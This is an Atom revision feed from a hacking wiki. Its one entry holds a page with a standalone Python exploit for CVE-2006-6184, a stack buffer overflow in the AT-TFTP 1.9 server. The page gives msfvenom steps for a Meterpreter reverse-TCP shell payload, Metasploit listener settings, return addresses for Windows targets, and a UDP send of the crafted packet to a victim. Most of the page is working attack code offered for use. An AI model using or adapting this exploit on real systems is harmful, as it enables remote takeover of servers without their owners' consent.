<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2006-6184_AT-TFTP1.9%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2006-6184 AT-TFTP1.9緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2006-6184_AT-TFTP1.9%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2006-6184_AT-TFTP1.9%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-20T12:56:28Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2006-6184_AT-TFTP1.9%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=841&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; # CVE-2006-6184 This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2006-6184_AT-TFTP1.9%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=841&amp;oldid=prev"/>
		<updated>2021-04-01T03:20:14Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; # CVE-2006-6184 This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# CVE-2006-6184&lt;br /&gt;
This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflow in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allowing remote attackers to cause a denial of service or execute arbitrary code.&lt;br /&gt;
&lt;br /&gt;
### Instructions (Updated for 2020)&lt;br /&gt;
The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.&lt;br /&gt;
To do so, use the following steps:&lt;br /&gt;
 &lt;br /&gt;
1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):&lt;br /&gt;
```sh&lt;br /&gt;
perl -e 'print &amp;quot;\x81\xec\xac\x0d\x00\x00&amp;quot;' &amp;gt; stackadj&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
2.) Next, use the following command to create a staged meterpreter shell payload:&lt;br /&gt;
```sh&lt;br /&gt;
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R &amp;gt; payload&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
3.) Then, combine the two files you just created.&lt;br /&gt;
```sh&lt;br /&gt;
cat stackadj payload &amp;gt; shellcode&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
4.) Finally, let's eliminate the bad characters.&lt;br /&gt;
```sh&lt;br /&gt;
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b &amp;quot;\x00&amp;quot; -e x86/shikata_ga_nai -f python&lt;br /&gt;
```&lt;br /&gt;
&lt;br /&gt;
Enter the output as the value of the &amp;quot;payload&amp;quot; variable. You may need to run this exploit a few times for it to work.&lt;br /&gt;
&lt;br /&gt;
### Metasploit Listener&lt;br /&gt;
1. use exploit/multi/handler&lt;br /&gt;
2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp&lt;br /&gt;
3. set ExitOnSession false&lt;br /&gt;
4. set AutoRunScript post/windows/manage/migrate&lt;br /&gt;
5. exploit -j&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==atftp.py==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
# Standalone exploit for Allied Telesyn TFTP Server 1.9&lt;br /&gt;
# Written by daleksec 07/21/2016&lt;br /&gt;
# Special thanks to NetSec.ws for the excellent walk through (see http://netsec.ws/?p=262)&lt;br /&gt;
&lt;br /&gt;
import sys, socket&lt;br /&gt;
 &lt;br /&gt;
if len(sys.argv)&amp;lt;=2:&lt;br /&gt;
 sys.exit('''Usage: python attftp_long_filename.py &amp;lt;IP Address&amp;gt; &amp;lt;Port&amp;gt; &amp;lt;Your IP Address&amp;gt; &amp;lt;OS choice&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 0	Windows NT SP4 English&lt;br /&gt;
 1	Windows 2000 SP0 English&lt;br /&gt;
 2	Windows 2000 SP1 English&lt;br /&gt;
 3	Windows 2000 SP2 English&lt;br /&gt;
 4	Windows 2000 SP3 English&lt;br /&gt;
 5	Windows 2000 SP4 English&lt;br /&gt;
 6	Windows XP SP0/1 English&lt;br /&gt;
 7	Windows XP SP2 English&lt;br /&gt;
 8	Windows XP SP3 English&lt;br /&gt;
 9	Windows Server 2003&lt;br /&gt;
 10	Windows Server 2003 SP2&lt;br /&gt;
 ''')&lt;br /&gt;
 &lt;br /&gt;
host	= sys.argv[1]		# Victim's IP&lt;br /&gt;
port	= int(sys.argv[2])	# Victim's Port&lt;br /&gt;
lhost	= sys.argv[3]		# Attacker's IP&lt;br /&gt;
os	= int(sys.argv[4])	# OS Choice&lt;br /&gt;
ret	= []			# Define array containing return addresses&lt;br /&gt;
&lt;br /&gt;
# Define return addresses (Source: Metasploit)&lt;br /&gt;
ret = [&amp;quot;\xf7\xa6\x2e\x70&amp;quot;,&lt;br /&gt;
	&amp;quot;\xc3\x62\x03\x75&amp;quot;,&lt;br /&gt;
	&amp;quot;\x85\x1d\x03\x75&amp;quot;,&lt;br /&gt;
	&amp;quot;\x1b\x43\x03\x75&amp;quot;,&lt;br /&gt;
	&amp;quot;\x5a\x1c\xfe\x74&amp;quot;,&lt;br /&gt;
	&amp;quot;\xce\x1d\x03\x75&amp;quot;,&lt;br /&gt;
	&amp;quot;\xfb\x7b\xab\x71&amp;quot;,&lt;br /&gt;
	&amp;quot;\x72\x93\xab\x71&amp;quot;,&lt;br /&gt;
	&amp;quot;\x53\x93\x42\x7e&amp;quot;,&lt;br /&gt;
	&amp;quot;\xd3\xfe\x86\x7c&amp;quot;,&lt;br /&gt;
	&amp;quot;\x1b\xa0\x86\x7c&amp;quot;]&lt;br /&gt;
&lt;br /&gt;
nop	= &amp;quot;\x90&amp;quot; * (25-len(lhost))	# Create a NOP string as to bring NOPs + LHOST up to 25 bytes&lt;br /&gt;
&lt;br /&gt;
# The payload must be customized to include your own IP address and listening port, so you'll need to generate it manually.&lt;br /&gt;
# To do so, use the following steps:&lt;br /&gt;
# 1.) Enter the following to create a hex file of the amount that needs to be subtracted from the stack pointer (3500):&lt;br /&gt;
# perl -e 'print &amp;quot;\x81\xec\xac\x0d\x00\x00&amp;quot;' &amp;gt; stackadj&lt;br /&gt;
# 2.) Next, use the following command to create a staged meterpreter shell payload:&lt;br /&gt;
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R &amp;gt; payload&lt;br /&gt;
# 3.) Then, combine the two files you just created.&lt;br /&gt;
# cat stackadj payload &amp;gt; shellcode&lt;br /&gt;
# 4.) Finally, let's eliminate the bad characters.&lt;br /&gt;
# msfvenom -p generic/custom PAYLOADFILE=./shellcode -b &amp;quot;\x00&amp;quot; -e x86/shikata_ga_nai -f python&lt;br /&gt;
# Enter the output as the value of the &amp;quot;payload&amp;quot; variable. You may need to run this exploit a few times for it to work.&lt;br /&gt;
&lt;br /&gt;
payload	= &amp;quot;&amp;quot; # Payload (bad characters = \x00, stack adjustment = -3500, can't exceed 210 bytes of space)&lt;br /&gt;
# payload += &amp;quot;&amp;quot;&lt;br /&gt;
# payload += &amp;quot;&amp;quot;&lt;br /&gt;
# ...&lt;br /&gt;
&lt;br /&gt;
exploit	= &amp;quot;\x00\x02&amp;quot; + nop + payload + ret[os] + &amp;quot;\x83\xc4\x28\xc3\x00netascii\x00&amp;quot; 	# Our exploit so far &lt;br /&gt;
&lt;br /&gt;
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)	# Declare a UDP socket&lt;br /&gt;
client.sendto(exploit, (host, port))				# Send the exploit over UDP to the nominated addresses&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>